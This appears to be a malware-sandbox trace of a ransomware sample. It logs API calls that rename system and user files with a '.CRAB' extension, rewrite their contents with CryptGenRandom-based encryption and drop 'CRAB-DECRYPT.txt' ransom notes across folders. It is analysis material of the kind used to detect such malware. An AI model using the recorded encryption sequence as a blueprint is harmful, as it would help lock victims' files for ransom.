File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2376 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 2384 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f00aef54-2b29-4f30-9429-c13ae938f270}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2216 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 2224 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 880 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 880 True 1
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\Syscache.hve, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\Syscache.hve, destination_filename = C:\System Volume Information\Syscache.hve.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\Syscache.hve.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\Syscache.hve.CRAB, size = 1048576, size_out = 262144 True 1
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 262144 True 1
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\Syscache.hve.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\Syscache.hve.LOG1, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\Syscache.hve.LOG1, destination_filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 1048576, size_out = 41984 True 1
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 41984 True 1
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\Syscache.hve.LOG1.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\tracking.log, type = file_attributes True 1
File Move source_filename = C:\System Volume Information\tracking.log, destination_filename = C:\System Volume Information\tracking.log.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\System Volume Information\tracking.log.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\System Volume Information\tracking.log.CRAB, size = 1048576, size_out = 20480 True 1
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 20480 True 1
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 256 True 2
File Write filename = C:\System Volume Information\tracking.log.CRAB, size = 8 True 1
File Get Info filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{086bd6b5-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{086bd6b9-6870-11e7-8470-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f26b-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f271-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f275-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f279-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f27d-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f282-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f286-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{5369f294-5d78-11e7-9002-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{6af7a98d-5d7d-11e7-9bb9-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee35a-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee485-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7d2-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7d6-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{7d6ee7da-5d77-11e7-ab40-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{b3b06227-5d7f-11e7-8a02-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{da689ac8-5d73-11e7-8702-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{f838e7a7-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Get Info filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, type = file_attributes False 1
File Move source_filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}, destination_filename = C:\System Volume Information\{f838e7ab-6707-11e7-a8fc-0060389bba01}{3808876b-c176-4e48-b7ae-04046e6cc752}.CRAB False 1
File Create filename = C:\Users\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
File Create filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 1048576, size_out = 73307 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 73312 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\3I-LDvLH0.ppt.CRAB, size = 8 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 1048576, size_out = 17071 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 17072 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\4eWpORekA.mp3.CRAB, size = 8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\CRAB-DECRYPT.txt, size = 3278 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 1048576, size_out = 10 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 16 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js.CRAB, size = 8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 1048576, size_out = 5399 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 5408 True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 256 True 2
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata.CRAB, size = 8 True 1
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\CRAB-DECRYPT.txt, size = 3278 True 1
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl, type = file_attributes True 1
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
